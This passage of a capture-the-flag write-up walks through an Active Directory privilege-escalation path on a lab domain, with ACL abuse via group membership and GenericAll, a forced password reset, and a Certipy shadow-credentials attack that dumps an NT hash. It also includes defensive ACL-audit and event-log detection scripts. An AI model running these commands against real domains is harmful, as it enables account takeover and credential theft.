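EXTENDED_RIGHTS = {"00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
                   "ab721a53-1e2f-11d0-9819-00aa0040529b": "User-Change-Password"}
# Assumption of this example: principals expected to hold control rights.
TRUSTED_PRINCIPALS = {"domain admins", "enterprise admins", "administrators",
                      "local system", "enterprise domain controllers", "key admins",
                      "enterprise key admins", "creator owner", "principal self"}
Finding = namedtuple("Finding", "object_dn principal rights reason inherited")


def parse_records(text):
    """One dict per blank-line separated record; keys lower-cased, wrapped values rejoined."""
    records, current, last_key = [], {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            if current:
                records.append(current)
            current, last_key = {}, None
        elif " :" in line:
            key, _, value = line.partition(" :")
            last_key = key.strip().lower()
            current[last_key] = value.strip()
        elif last_key:  # continuation of a value wrapped onto the next line
            current[last_key] = (current[last_key] + " " + line).strip()
    return records + [current] if current else records


def decode_access_mask(mask):
    # Numeric AccessMask -> right names; a full-control mask collapses to GenericAll.
    names = {name for bit, name in ACCESS_MASK_BITS.items() if mask & bit}
    if (mask & 0xF01FF) == 0xF01FF or mask & 0x10000000:  # .NET GenericAll / GENERIC_ALL
        names.add("GenericAll")
    return names


def rights_of(rec):
    # Union of AccessMask and ActiveDirectoryRights, whichever form the dump uses.
    mask = rec.get("accessmask", "")
    names = decode_access_mask(int(mask)) if mask.isdigit() else set()
    for field in (mask, rec.get("activedirectoryrights", "")):
        names |= {r.strip() for r in field.split(",") if r.strip() and not r.strip().isdigit()}
    if "FullControl" in names:  # PowerView.py's name for GenericAll
        names.add("GenericAll")
    return names


def audit(text):
    """Return the allow ACEs that give an untrusted principal control of an object."""
    findings = []
    for rec in parse_records(text):
        if "accessmask" not in rec:
            continue  # not an ACE record
        if "DENIED" in rec.get("acetype", "").upper() or rec.get("acequalifier") == "AccessDenied":
            continue  # a deny ACE never grants anything
        principal = rec.get("securityidentifier", "")
        if principal.split("\\")[-1].lower() in TRUSTED_PRINCIPALS:
            continue
        rights, target = rights_of(rec), rec.get("objectacetype", "").lower()
        reasons = []
        if rights & CONTROL_RIGHTS:
            reasons.append("control right " + ",".join(sorted(rights & CONTROL_RIGHTS)))
        if "WriteProperty" in rights and (not target or target in SENSITIVE_ATTRIBUTES):
            reasons.append("write to " + (target or "all properties"))
        if "ExtendedRight" in rights and EXTENDED_RIGHTS.get(target) == "User-Force-Change-Password":
            reasons.append("force password reset")
        if reasons:
            inherited = "INHERITED_ACE" in rec.get("aceflags", "") or rec.get("isinherited") == "True"
            findings.append(Finding(rec.get("objectdn", ""), principal,
                                    tuple(sorted(rights)), "; ".join(reasons), inherited))
    return findings


# Two ACEs copied from the output above (trimmed to the fields used) and one
# constructed ACE for a hypothetical REBOUND\helpdesk principal.
SAMPLE_ACL = """\
ObjectDN : OU=Service Users,DC=rebound,DC=htb
ActiveDirectoryRights : FullControl
AccessMask : FullControl
SecurityIdentifier : REBOUND\\ServiceMgmt

ObjectDN : CN=Administrator,CN=Users,DC=rebound,DC=htb
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
AccessMask : 256
SecurityIdentifier : S-1-1-0
IsInherited : False

ObjectDN : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
AccessMask : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
SecurityIdentifier : REBOUND\\helpdesk
"""
```

Calling `audit(SAMPLE_ACL)` returns two findings: ServiceMgmt's explicit, non-inherited FullControl on the OU, and the constructed helpdesk write on msDS-KeyCredentialLink. The Everyone ACE is decoded (AccessMask 256 is ExtendedRight, the GUID is User-Change-Password, the ordinary change-own-password right) and correctly not reported; only User-Force-Change-Password would be. Paste the full dump of an OU in place of SAMPLE_ACL to triage it.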

Next, let's see what this OU contains.

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainObject -SearchBase "OU=Service Users,DC=rebound,DC=htb"
objectClass : top
person
organizationalPerson
user
cn : batch_runner
distinguishedName : CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 13:33:02 (today)
uSNCreated : 69335
uSNChanged : 185426
name : batch_runner
objectGUID : {fa00c3b6-5e6a-48b9-9fe0-897389addf60}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 1
codePage : 0
countryCode : 0
badPasswordTime : 04/04/2025 12:32:25 (today)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 09/04/2023 10:22:12 (1 year, 11 months ago)
logonHours : ////////////////////////////
pwdLastSet : 04/04/2025 13:33:00 (today)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7685
accountExpires : 1601-01-01 00:00:00+00:00
logonCount : 11
sAMAccountName : batch_runner
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601
lastLogonTimestamp : 09/04/2023 10:07:10 (1 year, 11 months ago)

objectClass : top
person
organizationalPerson
user
cn : winrm_svc
distinguishedName : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 13:33:02 (today)
uSNCreated : 69329
memberOf : CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
uSNChanged : 185427
name : winrm_svc
objectGUID : {e3c7114f-5864-4115-b3fb-4587e25790f5}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
codePage : 0
countryCode : 0
badPasswordTime : 04/04/2025 12:32:25 (today)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 04/04/2025 13:06:15 (today)
logonHours : ////////////////////////////
pwdLastSet : 04/04/2025 13:33:00 (today)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7684
accountExpires : 1601-01-01 00:00:00+00:00
logonCount : 4
sAMAccountName : winrm_svc
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601
lastLogonTimestamp : 04/04/2025 12:54:09 (today)

objectClass : top
organizationalUnit
ou : Service Users
distinguishedName : OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 13:33:03 (today)
uSNCreated : 69325
uSNChanged : 185428
name : Service Users
objectGUID : {fc826af9-06f9-47e7-866e-4c3c015638b8}
objectCategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601

It holds two notable CNs (Common Names), winrm_svc and batch_runner. The names suggest one runs batch jobs and the other can log in over WinRM.

Then look up the groups winrm_svc belongs to.

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainGroup -MemberIdentity "winrm_svc"
cn : Remote Management Users
description : Members of this group can access WMI resources over management protocols (such as WS-Management via
the Windows Remote Management service). This applies only to WMI namespaces that grant access to the
user.
member : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
distinguishedName : CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
instanceType : 4
name : Remote Management Users
objectGUID : {263ebfb8-61f1-4f04-97d1-c0e7399e85c8}
objectSid : S-1-5-32-580
sAMAccountName : Remote Management Users
sAMAccountType : SAM_ALIAS_OBJECT
groupType : -2147483643
objectCategory : CN=Group,CN=Schema,CN=Configuration,DC=rebound,DC=htb

So it really can log in remotely over port 5985.

So here we try to add oorend to the ServiceMgmt group. Before that, let's look at the group's current members: there are two, ppaul and fflock.

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainGroupMember -Identity "ServiceMgmt"
GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : ppaul
MemberDistinguishedName : CN=ppaul,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-1951

GroupDomainName : ServiceMgmt
GroupDistinguishedName : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
MemberDomain : rebound.htb
MemberName : fflock
MemberDistinguishedName : CN=fflock,CN=Users,DC=rebound,DC=htb
MemberSID : S-1-5-21-4078382237-1492182817-2568127209-3382

Then add oorend to the group.

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Add-DomainGroupMember -Identity "ServiceMgmt" -Members "oorend"
[2025-04-04 15:06:49] User oorend successfully added to ServiceMgmt

Listing the group members again shows three members, so the addition succeeded.

And because oorend now has full control over Service Users (through the ServiceMgmt membership), we can grant oorend every right on OU=Service Users, i.e. GenericAll. (In Active Directory, GenericAll is the highest permission level, equivalent to "Full Control": a principal holding it (here oorend) can perform every operation on the target object (here OU=Service Users), including creating/deleting objects, modifying attributes, resetting passwords and changing the ACL.)

Here we use bloodyAD to add the right.

Adding the right with bloodyAD

bloodyAD --host 10.10.11.231 -u oorend -p '1GR8t@$$4u' -d bloody add genericAll "OU=Service Users,DC=rebound,DC=htb" "oorend"

It reports no access. That is because the group membership gets dropped again; just re-run the group addition.

Of course, our favourite impacket tool, dacledit.py, can add it as well.

dacledit.py rebound.htb/oorend:'1GR8t@$$4u' -k -dc-ip 10.10.11.231 -action write -rights FullControl -inheritance -principal oorend -target-dn "OU=Service Users,DC=rebound,DC=htb" -use-ldaps

PS: if this fails with INSUFF_ACCESS_RIGHTS, check whether oorend was never added to ServiceMgmt, or has been dropped from it again, and re-run that step.

Once the right is in place we can change winrm_svc's password.

bloodyAD --host 10.10.11.231 -u oorend -p '1GR8t@$$4u' -d bloody set password "winrm_svc" '123qwe!@#'

The rights may get dropped again; if so, re-run the previous steps together.

Now a WinRM login attempt succeeds.

Shadow Credentials

Windows Hello for Business overview

[MS-ADTS]: msDS-KeyCredentialLink

GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

But have you considered that changing the password outright gets noticed by the account's owner? That is where the Shadow Credentials technique (built on Windows Hello) comes in: a credential can be added to the msDS-KeyCredentialLink attribute, which the default ADUC view does not show, although ADSI Edit and LDAP browsers do display it. Quoting the Certipy project (linked above):

In short, the Shadow Credentials attack is performed by adding a new “Key Credential” to the target account. The Key Credential can then be used with the PKINIT Kerberos extension for authentication.

Certipy’s shadow command has an auto action, which will add a new Key Credential to the target account, authenticate with the Key Credential to retrieve the NT hash and a TGT for the target, and finally restore the old Key Credential attribute.

Here we use Certipy-AD.

pipx install certipy-ad

Note: sync the clock with ntpdate before running the shadow credential step, because it uses Kerberos.

certipy shadow auto -account 'winrm_svc' -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -dc-ip 10.10.11.231 -k -target-ip dc01.rebound.htb

It reports no permission; the group membership and the right added earlier were probably dropped again, so re-run those steps.

┌──(root㉿escorpion)-[~]
└─# certipy shadow auto -account 'winrm_svc' -u 'oorend@rebound.htb' -p '1GR8t@$$4u' -dc-ip 10.10.11.231 -k -target-ip dc01.rebound.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos or SSPI authentication is used. This might fail
[*] Targeting user 'winrm_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb'
[*] Adding Key Credential with device ID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb' to the Key Credentials for 'winrm_svc'
[*] Successfully added Key Credential with device ID 'a2f273f5-8eac-a60f-491c-1efa66cfa1cb' to the Key Credentials for 'winrm_svc'
[*] Authenticating as 'winrm_svc' with the certificate
[*] Using principal: winrm_svc@rebound.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Restoring the old Key Credentials for 'winrm_svc'
[*] Successfully restored the old Key Credentials for 'winrm_svc'
[*] NT hash for 'winrm_svc': 4469650fd892e98933b4536d2e86e512

This gives us the NTLM hash 4469650fd892e98933b4536d2e86e512.
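
The Certipy output above shows the whole sequence from the attacker's side: a key credential is added, used for PKINIT, and the attribute is restored. As an added example, not code from the write-up or from Certipy, here is what the same sequence looks like to a defender reading the domain controller's Security log. Event ID 5136 (a directory service object was modified) carries the attribute name in LDAPDisplayName and the operation in OperationType; Event ID 4768 (a Kerberos TGT was requested) carries Certificate Information fields that are only populated for PKINIT logons. Those IDs and field names are the real Windows schema; the event records, timestamps, source IP and the KEYADMIN-SVC$ writer allowlist are constructed for the example.

```python
"""Detect Shadow Credentials activity in Windows Security events.

Added example, not code from the write-up or from Certipy. It correlates records
in the shape of Event ID 5136 (directory object modified; the attribute name is
in LDAPDisplayName) and Event ID 4768 (TGT requested; a PKINIT logon fills the
Certificate Information fields) to flag a key credential that one principal
wrote onto another account and that was then used to log on as that account.
"""
from datetime import datetime, timedelta

KEY_ATTRIBUTE = "msDS-KeyCredentialLink"
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"  # 5136 OperationType codes
# Assumption of this example: principals allowed to write the attribute for other
# accounts (a device-registration / key-admin service account).
EXPECTED_WRITERS = {"keyadmin-svc$"}
WINDOW = timedelta(minutes=30)  # how long after the write to look for its use


def account_of(object_dn):
    """CN=winrm_svc,OU=... -> winrm_svc (lower-cased)."""
    return object_dn.split(",")[0].partition("=")[2].lower()


def shadow_credential_alerts(events):
    """One alert per msDS-KeyCredentialLink write made by someone other than the account."""
    events = sorted(events, key=lambda e: e["time"])
    alerts = []
    for i, ev in enumerate(events):
        if (ev["EventID"] != 5136 or ev.get("LDAPDisplayName") != KEY_ATTRIBUTE
                or ev.get("OperationType") != VALUE_ADDED):
            continue
        account, writer = account_of(ev["ObjectDN"]), ev["SubjectUserName"].lower()
        if writer in EXPECTED_WRITERS or writer.rstrip("$") == account:
            continue  # self-enrolment (Windows Hello) or the key-admin service: expected
        alert = {"account": account, "writer": writer, "added_at": ev["time"],
                 "pkinit_logon": None, "restored": False}
        for later in events[i + 1:]:
            if later["time"] - ev["time"] > WINDOW:
                break
            if (later["EventID"] == 4768 and later["TargetUserName"].lower() == account
                    and later.get("CertThumbprint")):
                alert["pkinit_logon"] = later["time"]  # the new key was used for PKINIT
            elif (later["EventID"] == 5136 and account_of(later["ObjectDN"]) == account
                    and later.get("LDAPDisplayName") == KEY_ATTRIBUTE
                    and later.get("OperationType") == VALUE_DELETED):
                alert["restored"] = True  # the added value was removed again: cleanup
        alerts.append(alert)
    return alerts


T0 = datetime(2025, 4, 4, 15, 10, 0)
SAMPLE_EVENTS = [  # constructed events in the two schemas, around the accounts used above
    {"EventID": 5136, "time": T0, "SubjectUserName": "oorend",
     "ObjectDN": "CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb",
     "LDAPDisplayName": KEY_ATTRIBUTE, "OperationType": VALUE_ADDED},
    {"EventID": 4768, "time": T0 + timedelta(seconds=8), "TargetUserName": "winrm_svc",
     "IpAddress": "10.10.14.5", "CertThumbprint": "constructed-thumbprint"},
    {"EventID": 5136, "time": T0 + timedelta(seconds=12), "SubjectUserName": "oorend",
     "ObjectDN": "CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb",
     "LDAPDisplayName": KEY_ATTRIBUTE, "OperationType": VALUE_DELETED},
    {"EventID": 5136, "time": T0 + timedelta(hours=2), "SubjectUserName": "KEYADMIN-SVC$",
     "ObjectDN": "CN=tbrady,CN=Users,DC=rebound,DC=htb",
     "LDAPDisplayName": KEY_ATTRIBUTE, "OperationType": VALUE_ADDED},  # benign enrolment
    {"EventID": 4768, "time": T0 + timedelta(hours=3), "TargetUserName": "tbrady",
     "IpAddress": "10.10.11.231", "CertThumbprint": ""},  # password-based TGT, benign
]

if __name__ == "__main__":
    for a in shadow_credential_alerts(SAMPLE_EVENTS):
        print(f"{a['writer']} wrote a key credential onto {a['account']} at {a['added_at']}; "
              f"PKINIT logon: {a['pkinit_logon']}; restored: {a['restored']}")
```

Two caveats for using this on real logs: 5136 is only generated when the "Audit Directory Service Changes" subcategory is enabled and the account objects carry a SACL that audits attribute writes, and in a domain with Windows Hello for Business enrolment the EXPECTED_WRITERS allowlist is what keeps the rule quiet. The "restored" flag is the tell for the automated workflow: a key added and deleted again within seconds, bracketing a certificate logon, is not how a user enrols a device.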

bloodhound

Run BloodHound collection in one go.

bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c All -ns 10.10.11.231

Note: if errors appear, it is most likely a clock problem; also disable VMware's time synchronization (in the VM settings).

apt install ntpdate
sudo ntpdate rebound.htb

or

timedatectl set-ntp off
rdate -n [IP of Target]

After syncing there are still some errors, but part of the data is collected.

Besides bloodhound-python, nxc (NetExec) can do the collection as well.

nxc ldap rebound.htb -u ldap_monitor -p '1GR8t@$$4u' -k --bloodhound -c all --dns-server 10.10.11.231

Unlike the earlier LDAPS approach, this one authenticates over Kerberos because of the -k flag.


BloodHound in detail

I only skimmed this before, so here are the steps in detail. After importing the data, refresh the database.

First search for your starting nodes; since we started from ldap_monitor and oorend, search for those two, add them to the owned list, and set the start node.

Then view the shortest paths from owned principals to Domain Admins.

(On Windows you can also connect directly with Active Directory Users and Computers.)

Enumerating active users with qwinsta

Here SI stands for Session Indicator, which shows that there is an active user.

Check whether any users have active sessions.

*Evil-WinRM* PS C:\Users\winrm_svc> qwinsta
qwinsta.exe : No session exists for *
+ CategoryInfo : NotSpecified: (No session exists for *:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError

Upload RunasCs with evil-winrm.

https://github.com/antonioCoco/RunasCs

upload /root/htb/Rebound/RunasCs.exe

Management tools and logon types reference - Windows Server

Look at the logon types.

Use logon type 9 to run the session query.

*Evil-WinRM* PS C:\Users\winrm_svc> .\RunasCs.exe oorend '1GR8t@$$4u' "qwinsta" -l 9

SESSIONNAME USERNAME ID STATE TYPE DEVICE
>services 0 Disc
console tbrady 1 Active

The tbrady account is logged on at the console.

Upload PowerView and import it (I just learned that dot-sourcing with . works instead of Import-Module):

upload /root/htb/Rebound/PowerView.ps1
. .\PowerView.ps1

SAM account name (samaccountname): the unique identifier of a Windows domain user, typically used in logons of the form DOMAIN\samaccountname. It differs from the UserPrincipalName (UPN, e.g. user@domain.com) and is shorter (e.g. admin, user1).

*Evil-WinRM* PS C:\Users\winrm_svc> get-domainuser -identity tbrady


logoncount : 50
badpasswordtime : 4/4/2025 5:32:25 AM
distinguishedname : CN=tbrady,CN=Users,DC=rebound,DC=htb
objectclass : {top, person, organizationalPerson, user}
lastlogontimestamp : 4/4/2025 2:30:48 AM
name : tbrady
objectsid : S-1-5-21-4078382237-1492182817-2568127209-7686
samaccountname : tbrady
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 4/4/2025 9:30:48 AM
instancetype : 4
usncreated : 69346
objectguid : d9ee43f7-de07-42ee-9f51-cd9c1f37e111
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dscorepropagationdata : {8/25/2023 10:05:00 PM, 1/1/1601 12:00:00 AM}
lastlogon : 4/4/2025 6:42:21 AM
badpwdcount : 0
cn : tbrady
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 4/8/2023 9:08:31 AM
primarygroupid : 513
pwdlastset : 4/8/2023 2:08:31 AM
msds-supportedencryptiontypes : 0
usnchanged : 184371

tbrady logged on just recently.

Check the other service accounts (even when querying all of them, add a filter, otherwise the query takes too long):

*Evil-WinRM* PS C:\Users\winrm_svc> get-adserviceaccount -filter *


DistinguishedName : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
Enabled : True
Name : delegator
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : c9da97ae-5e35-44d2-aa15-114aecdc0caf
SamAccountName : delegator$
SID : S-1-5-21-4078382237-1492182817-2568127209-7687
UserPrincipalName :

Check whether the users' group memberships reveal anything:

*Evil-WinRM* PS C:\Users\winrm_svc> get-domainuser -properties samaccountname,memberof

samaccountname memberof
-------------- --------
Administrator {CN=Group Policy Creator Owners,CN=Users,DC=rebound,DC=htb, CN=Domain Admins,CN=Users,DC=rebound,DC=htb, CN=Enterprise Admins,CN=Users,DC=rebound,DC=htb, CN=Schema Admins,CN=Users,DC=rebound,DC=htb...}
Guest CN=Guests,CN=Builtin,DC=rebound,DC=htb
krbtgt CN=Denied RODC Password Replication Group,CN=Users,DC=rebound,DC=htb
ppaul CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
llune
fflock CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc CN=Remote Management Users,CN=Builtin,DC=rebound,DC=htb
batch_runner
tbrady

Besides individual users, there is also the Everyone group:

*Evil-WinRM* PS C:\Users\winrm_svc> get-domainobjectacl | where-object { $_.SecurityIdentifier -eq "S-1-1-0" }


ObjectDN : DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209
ActiveDirectoryRights : DeleteChild
BinaryLength : 20
AceQualifier : AccessDenied
IsCallback : False
OpaqueLength : 0
AccessMask : 2
SecurityIdentifier : S-1-1-0
AceType : AccessDenied
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209
ActiveDirectoryRights : ReadProperty
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 16
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=AdminSDHolder,CN=System,DC=rebound,DC=htb
ObjectSID :
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Administrator,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-500
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Guest,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-501
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32
ActiveDirectoryRights : ReadProperty
BinaryLength : 20
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 16
SecurityIdentifier : S-1-1-0
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Administrators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-544
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-4
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-11
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Print Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-550
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Backup Operators,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-551
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Replicator,CN=Builtin,DC=rebound,DC=htb
ObjectSID : S-1-5-32-552
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=rebound,DC=htb
ObjectSID : S-1-5-17
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=DC01,OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-1000
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=krbtgt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-502
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 40
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-1-0
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None

ObjectDN : CN=Domain Controllers,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-516
